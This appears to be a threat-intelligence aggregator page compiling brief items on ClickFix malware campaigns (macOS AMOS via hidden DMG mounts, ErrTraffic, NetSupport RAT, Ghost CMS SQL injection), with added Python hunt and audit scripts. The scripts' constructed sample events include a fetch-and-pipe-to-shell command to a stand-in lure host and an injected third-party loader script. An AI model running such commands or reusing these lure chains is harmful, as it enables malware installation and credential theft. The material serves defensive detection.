ctipilot.ch

macOS ClickFix uses hdiutil -nobrowse to mount DMG invisibly, drops AMOS

campaign · item:macos-clickfix-hdiutil-amos

  • Coverage timeline: 1 (first 2026-06-24 → last 2026-06-24)
  • Briefs: 1 (1 distinct)
  • Sources cited: 18 (15 hosts)
  • Sections touched: 1 (research)
  • Co-occurring entities: 8

Story timeline

  1. 2026-06-24: CTI Daily Brief — 2026-06-24 (research). First coverage. ClickFix evolution; single-source.

Where this entity is cited

  • research: 1

Source distribution

  • bleepingcomputer.com: 2 (11%)
  • malwarebytes.com: 2 (11%)
  • microsoft.com: 2 (11%)
  • blog.sekoia.io: 1 (6%)
  • blog.xlab.qianxin.com: 1 (6%)
  • github.com: 1 (6%)
  • huntress.com: 1 (6%)
  • isc.sans.edu: 1 (6%)
  • other: 7 (39%)

Items in briefs about macOS ClickFix uses hdiutil -nobrowse to mount DMG invisibly, drops AMOS (8)

macOS ClickFix evolves: `hdiutil attach -nobrowse` mounts the malicious DMG invisibly before dropping AMOS `[SINGLE-SOURCE]`

From CTI Daily Brief — 2026-06-24 · published 2026-06-24

A new macOS ClickFix variant (Palo Alto Unit 42, via BleepingComputer 2026-06-23) drops the visible-DMG step: the fake-CAPTCHA Terminal lure now has the user paste a curl command that uses hdiutil attach -nobrowse to mount the disk image without it appearing in Finder or on the desktop, then launches a self-signed app via open (BleepingComputer, 2026-06-23). The payload is Atomic macOS Stealer (AMOS): it presents a fake System Preferences authentication prompt to capture the local password, then steals browser credentials across numerous Chromium- and Firefox-derived browsers, cryptocurrency-wallet data, and Keychain contents. [SINGLE-SOURCE] — BleepingComputer attributes to Unit 42 but a separate primary Unit 42 article for this specific technique was not located this run (see § 7). Detection on macOS: hdiutil attach -nobrowse invoked by a shell parented by Terminal; Terminal executing pasted commands referencing external download URLs; apps launched from /Volumes/ mounts; user awareness that legitimate CAPTCHAs never require Terminal input (T1204.001, T1105, T1555).

Research: ClickFix matured into a productised malware-as-a-service supply chain

From CTI Weekly Summary — 2026-W25 (Jun 15 – Jun 21, 2026) · published 2026-06-22

A second cross-day research thread: the ClickFix technique — fake browser/update dialogues that trick users into pasting attacker PowerShell — has industrialised. Sekoia documented ErrTraffic, a ClickFix Malware-as-a-Service framework that resolves its C2 through the Polygon blockchain (Sekoia, 2026-06-17; daily 06-17), and Huntress detailed the Potemkin loader delivering RMMProject RAT through a ClickFix chain that also bypasses Chromium App-Bound Encryption (Huntress, 2026-06-17; daily 06-17). ErrTraffic also surfaced as one of the SocGholish-adjacent clusters still operating after the Operation Endgame takedown (§ 8). The pattern for defenders: ClickFix is now a delivery channel with multiple competing operators and resilient C2, so user-paste-to-PowerShell detection (clipboard-sourced powershell.exe/mshta.exe invocations, RunMRU artefacts) is worth promoting from awareness training to a standing hunt.

Sekoia: ErrTraffic — a ClickFix Malware-as-a-Service framework resolving C2 through the Polygon blockchain

From CTI Daily Brief — 2026-06-17 · published 2026-06-17

ClickFix — fake browser/update dialogues that trick users into pasting attacker PowerShell — is maturing into a productised delivery channel, as this and the next item show. Sekoia's TDR team analysed ErrTraffic, a ClickFix distribution framework sold as MaaS by an actor using the handle "LenAI" on the Exploit.IN forum since at least December 2025 (Sekoia TDR, 2026-06-16). Affiliates compromise WordPress sites by credential-stuffing wp-login.php (one victim saw seven residential IPs in an 80-second window) or via WP File Manager CVE-2020-25213, then deploy a PHP backdoor as a must-use plugin (session-manager.php) that injects the ErrTraffic JavaScript. The JavaScript uses the EtherHiding technique — querying Polygon smart contracts via public RPC endpoints — to resolve C2 domains dynamically, defeating takedowns; it then serves ClickFix lures that drop Vidar, Stealc, SmokeLoader and others. ErrTraffic explicitly targets European and APAC visitors, putting public-sector WordPress portals in scope.

Why it matters to us: A reliable hunt artefact is the distinctive PowerShell comment block <# Code Verification: NNNNNNNNNNNN #> Sekoia found at the start of ErrTraffic command strings. Also watch for new PHP files under wp-content/mu-plugins/ (auto-loaded, no activation needed), credential-stuffing bursts on wp-login.php, and outbound requests from the web-server process to blockchain RPC endpoints.

SmartApeSG ClickFix stages an unnamed RAT that pivots to a weaponised NetSupport Manager [SINGLE-SOURCE]

From CTI Daily Brief — 2026-06-01 · published 2026-06-01

SANS ISC handler Brad Duncan published a same-day forensic diary (2026-06-01) reconstructing an infection observed on 2026-05-27 that began with the SmartApeSG ClickFix campaign — fake browser-verification / "press Win+R" lures served from compromised pages — and ended in a full NetSupport Manager RAT deployment (SANS ISC, 2026-06-01). The ClickFix execution (T1204.001) drops a ZIP carrying an unnamed staging RAT that, per Duncan, has been beaconing to its C2 over TCP/443 since at least April 2026 using a custom encoded protocol rather than TLS; that staging RAT then fetched the NetSupport payload as a ~17 MB Microsoft Cabinet (setup.cab). The install chain is processor.vbs (a 109-byte VBScript launcher in C:\ProgramData\, T1059.005) → token.bat (extracts the CAB into C:\ProgramData\UpdateInstaller\, sets persistence, then self-deletes all three dropper components, T1070.004) → NetSupport RAT C2 over port 443 (T1219 Remote Access Tools). Because NetSupport is legitimate commercial software, its presence and traffic blend with benign remote-support telemetry.

This is a single-source handler diary (HIGH-reliability source, single-day observation) and carries no independent corroboration of the identical chain in-window — treat the specifics as one analyst's forensic account. Detection concepts a SOC can apply without IOCs: browser process (chrome.exe/msedge.exe/firefox.exe) spawning wscript.exe/mshta.exe/cmd.exe (Sysmon EID 1 with browser parent-image); short-lived .vbs/.bat file-creates in C:\ProgramData\ (Sysmon EID 11); CAB expansion via expand.exe/wusa.exe from ProgramData; and registry Run-key persistence pointing at a non-standard NetSupport path (C:\ProgramData\UpdateInstaller\ rather than the legitimate C:\Program Files\NetSupport\). Where TLS inspection is in place, unencrypted payload on port 443 from a NetSupport process is anomalous.
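A hunt over constructed Sysmon-style events that covers the browser-to-interpreter, dropped-script and Run-key concepts in this item together with the `<# Code Verification: … #>` marker from the Sekoia ErrTraffic item above. This is an added example, not code from the brief, SANS ISC or Sekoia; the event shape, file and key names and the `client32.exe` data value are constructed sample values.

```python
import re

# Constructed Sysmon-style events (EID 1 process create, 11 file create, 13 registry set); not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\ProgramData\processor.vbs"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden <# Code Verification: 483920175566 #> <rest elided>"},
    {"EventID": 11, "Image": r"C:\Windows\System32\wscript.exe",
     "TargetFilename": r"C:\ProgramData\token.bat"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\ProgramData\UpdateInstaller\client32.exe"},
    # Benign control: cmd.exe running a build script, no browser or explorer parent.
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe"}
ERRTRAFFIC_MARKER = re.compile(r"<#\s*Code Verification:\s*\d+\s*#>")  # Sekoia's hunt artefact
PROGRAMDATA = "c:\\programdata\\"

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the names of every rule this single event matches (empty if none)."""
    hits, eid = [], ev["EventID"]
    if eid == 1:
        parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
        if parent in BROWSERS and child in INTERPRETERS:
            hits.append("browser-spawned-interpreter")
        if parent == "explorer.exe" and child in INTERPRETERS:
            hits.append("explorer-spawned-interpreter")  # Win+R path; noisy, correlate with RunMRU
        if ERRTRAFFIC_MARKER.search(ev.get("CommandLine", "")):
            hits.append("errtraffic-comment-marker")
    elif eid == 11:
        target = ev["TargetFilename"].lower()
        if target.startswith(PROGRAMDATA) and target.endswith((".vbs", ".bat")):
            hits.append("script-dropped-in-programdata")
    elif eid == 13:
        if "\\currentversion\\run\\" in ev["TargetObject"].lower() and ev["Details"].lower().startswith(PROGRAMDATA):
            hits.append("run-key-into-programdata")
    return hits

def hunt(events):
    # Pair each matching event's index with its rule name, in event order.
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]
```

The explorer.exe rule fires on ordinary Start-menu launches too, so in production it should be a correlation input alongside RunMRU rather than an alert on its own.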

Large-scale ClickFix campaign mass-compromises self-hosted Ghost CMS sites via CVE-2026-26980

From CTI Daily Brief — 2026-05-25 · published 2026-05-25

XLab researchers at Qianxin documented an active, large-scale campaign weaponising the unauthenticated SQL-injection flaw CVE-2026-26980 against self-hosted Ghost CMS instances, with more than 700 compromised domains observed — among them university portals (Harvard, Oxford and Auburn are named), AI/SaaS companies, media outlets, fintech firms, security sites and personal blogs, plus DuckDuckGo (BleepingComputer, 2026-05-24; XLab Qianxin, 2026-05-21). The intrusion is a two-stage operation: the attacker first exploits the pre-auth SQLi in Ghost's Content API to read the admin API key out of the database, then uses that key — which carries full content-management scope — to inject a lightweight JavaScript loader into published articles. The loader pulls a second-stage cloaking script that fingerprints each visitor; those who qualify are served a fake Cloudflare "verify you are human" prompt in an iframe overlaid on the article (the ClickFix / FakeCaptcha pattern) instructing them to paste a supplied command into the Windows Run dialog, which drops DLL loaders, JavaScript droppers, or an Electron-based sample (UtilifySetup.exe) (BleepingComputer, 2026-05-24).

Why it matters to us: self-hosted Ghost is used across EU/CH universities, NGOs and independent media — exactly the named victim profile — and the campaign weaponises a flaw patched back in February (6.19.1) against the still-unpatched long tail. The threat is two-sided: site operators face server-side compromise and admin-key theft (rotate the key and audit posts/themes for injected <script> even after patching, per § 2 and § 5), while every visitor to a compromised site is a ClickFix target. The client-side execution chain is the higher-value, product-agnostic hunt — cmd.exe / powershell.exe spawned from a browser process tree following a Run-dialog paste — and is worth hunting regardless of whether you run Ghost (see § 5).

CVE-2026-26980 — Ghost CMS unauthenticated blind SQL injection, mass-exploited into a ClickFix infostealer chain

From CTI Weekly Summary — 2026-W22 (May 25 – May 31, 2026) · published 2026-05-25

If you did nothing this week: self-hosted Ghost CMS instances are being mass-compromised through an unauthenticated blind SQL injection in the Content API slug filter, then weaponised as ClickFix social-engineering pages that serve infostealers to their own visitors.

XLab (Qianxin) and BleepingComputer document a large-scale campaign exploiting CVE-2026-26980 (CVSS 9.4, first covered 2026-05-25, GitHub advisory GHSA-w52v-v783-gw97). The dual-use is what makes this a §1 item rather than a routine SQLi: the same flaw both compromises the publishing platform and turns it into a watering hole. Public-sector, education and media organisations running self-hosted Ghost should patch to the fixed release and check for ClickFix-style injected content and unexpected database reads against the Content API.
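An audit of exported Ghost post HTML for the injected-loader and overlay-iframe pattern described in the two Ghost items above. This is an added example, not XLab's, Ghost's or the brief's code; the export is reduced to the `{"posts": [{"slug", "html"}]}` shape, and the sample posts and the first-party host allowlist are constructed.

```python
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY_HOSTS = {"blog.example.org", "cdn.example.org"}  # assumed hosts allowed in <script src>

SAMPLE_EXPORT = json.dumps({"posts": [  # constructed, shaped like a Ghost Admin API posts export
    {"slug": "welcome", "html": '<p>Hello world.</p><script src="https://cdn.example.org/embed.js"></script>'},
    {"slug": "annual-report", "html": (
        "<p>Figures for the year.</p>"
        '<script src="//static.example.invalid/l.js"></script>'   # injected loader
        "<script>var f=document.createElement('iframe');</script>")},
    {"slug": "team", "html": "<p>Meet the team.</p>"},
]})

class _PostAuditor(HTMLParser):
    """Collects third-party <script src>, inline <script> bodies and <iframe> elements."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_script = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            host = urlparse(a.get("src") or "").hostname
            if host and host not in FIRST_PARTY_HOSTS:   # relative src counts as first-party
                self.findings.append(("third-party-script", a["src"]))
        elif tag == "iframe":
            self.findings.append(("iframe", a.get("src") or ""))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script and data.strip():
            self.findings.append(("inline-script", data.strip()[:60]))

def audit_post_html(html):
    p = _PostAuditor()
    p.feed(html)
    p.close()
    return p.findings

def audit_export(export_json):
    """Map slug -> findings for every post whose HTML carries flagged content."""
    report = {}
    for post in json.loads(export_json)["posts"]:
        findings = audit_post_html(post.get("html") or "")
        if findings:
            report[post["slug"]] = findings
    return report
```

Run it against a fresh export after rotating the admin API key, since the key that injected the content can re-inject it until it is revoked.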

ClickFix campaign expands to macOS — Macsync, Shub Stealer and AMOS delivered via Base64 Terminal commands that bypass Gatekeeper

From CTI Daily Brief — 2026-05-10 · published 2026-05-10

Microsoft Threat Intelligence on 2026-05-06 documented an active ClickFix social-engineering campaign now targeting macOS users via fake utility-installation guides hosted on Medium, Squarespace, and Craft-built blogs (Microsoft Security Blog, 2026-05-06 · Malwarebytes — Shub Stealer earlier wave, 2026-03). The lure pages instruct the visitor to copy a Base64-encoded command into Terminal; the decoded one-liner pipes a remote shell payload directly to bash, bypassing Gatekeeper because no signed application bundle is ever launched. Three distinct infostealers — Macsync, Shub Stealer, and AMOS (Atomic macOS Stealer) — are delivered across campaign variants per Microsoft, harvesting macOS Keychain entries, browser-profile credentials, iCloud data, and cryptocurrency wallet keys (Trezor, Ledger, Exodus, Electrum, Atomic, Coinomi, MetaMask, Phantom). Some variants substitute backdoored DMG copies of legitimate wallet applications (Ledger Live, Trezor Suite). Persistence uses LaunchAgent / LaunchDaemon plists with Telegram-fallback C2.

ATT&CK mapping: T1204.002 User Execution: Malicious File, T1059.004 Unix Shell, T1555.001 Credentials from Password Stores: Keychain. Detection concepts: alert on Terminal spawning curl / wget immediately followed by pipe-to-shell execution from a non-developer profile; LaunchAgent file-creation events from outside /Applications or /Library/Application Support/<vendor> paths; anomalous Keychain API calls from processes without UI entitlements (Endpoint Security framework ES_EVENT_TYPE_NOTIFY_OPENSSH-style hooks expose this on EDR-instrumented Macs).

Detect ClickFix-style Terminal-paste social engineering on macOS endpoints

From CTI Daily Brief — 2026-05-10 · published 2026-05-10

Add detection for Terminal spawning curl / wget immediately followed by pipe-to-shell execution from a non-developer profile, anomalous LaunchAgent / LaunchDaemon plist creation outside /Applications and /Library/Application Support/<vendor> paths, and Keychain-API access by processes without UI entitlements (Microsoft Security Blog, 2026-05-06). Brief end-users that Base64 Terminal-paste prompts on utility-installation pages are a malware delivery technique.
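A hunt over constructed macOS process and file events that covers this item's Terminal-paste and launch-item concepts together with the `hdiutil attach -nobrowse` and `/Volumes/` launch indicators from the 2026-06-24 item at the top of this page. This is an added example, not Microsoft's, Unit 42's or the brief's code; the event shape, PIDs, paths, the lure URL and the `TERMINALS` set are assumptions.

```python
import re

# Constructed process/file events in an Endpoint-Security-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 100, "ppid": 1, "name": "Terminal", "argv": ["Terminal"]},
    {"type": "exec", "pid": 101, "ppid": 100, "name": "zsh", "argv": ["-zsh"]},
    {"type": "exec", "pid": 102, "ppid": 101, "name": "sh",
     "argv": ["sh", "-c", "curl -fsSL https://lure.example.invalid/i.sh | sh"]},
    {"type": "exec", "pid": 103, "ppid": 101, "name": "hdiutil",
     "argv": ["hdiutil", "attach", "-nobrowse", "/tmp/update.dmg"]},
    {"type": "exec", "pid": 104, "ppid": 101, "name": "open", "argv": ["open", "/Volumes/Update/Update.app"]},
    {"type": "file_create", "pid": 105, "ppid": 104,
     "path": "/Users/alice/Library/LaunchAgents/com.update.agent.plist"},
    # Benign control: hdiutil under an installer (pid 200) with no terminal ancestor.
    {"type": "exec", "pid": 201, "ppid": 200, "name": "hdiutil",
     "argv": ["hdiutil", "attach", "-nobrowse", "/tmp/tool.dmg"]},
]

TERMINALS = {"Terminal", "iTerm2"}  # assumed interactive terminal apps
PIPE_TO_SHELL = re.compile(r"\b(curl|wget|base64)\b[^|]*\|\s*(ba|z)?sh\b")  # fetch/decode piped to a shell
LAUNCH_ITEM = re.compile(r"/Launch(Agents|Daemons)/[^/]+\.plist$")

def from_terminal(pid, ppid_of, name_of):
    """True if the process or any ancestor present in the events is a terminal app."""
    seen = set()
    while pid in ppid_of and pid not in seen:
        seen.add(pid)
        if name_of.get(pid) in TERMINALS:
            return True
        pid = ppid_of[pid]
    return False

def hunt(events):
    """Return (pid, rule) pairs; every rule is scoped to terminal-descended activity."""
    ppid_of = {e["pid"]: e["ppid"] for e in events}
    name_of = {e["pid"]: e["name"] for e in events if e["type"] == "exec"}
    findings = []
    for e in events:
        if not from_terminal(e["pid"], ppid_of, name_of):
            continue
        if e["type"] == "exec":
            if PIPE_TO_SHELL.search(" ".join(e["argv"])):
                findings.append((e["pid"], "pipe-to-shell"))
            if e["name"] == "hdiutil" and "attach" in e["argv"] and "-nobrowse" in e["argv"]:
                findings.append((e["pid"], "hidden-dmg-mount"))
            if e["name"] == "open" and any(a.startswith("/Volumes/") for a in e["argv"][1:]):
                findings.append((e["pid"], "app-launched-from-volumes"))
        elif e["type"] == "file_create" and LAUNCH_ITEM.search(e["path"]):
            findings.append((e["pid"], "launch-item-plist-written"))
    return findings
```

Scoping every rule to a terminal ancestor is what keeps developer and installer use of `hdiutil` and `curl` out of the alert queue; the non-developer-profile filter from the item above can be layered on top.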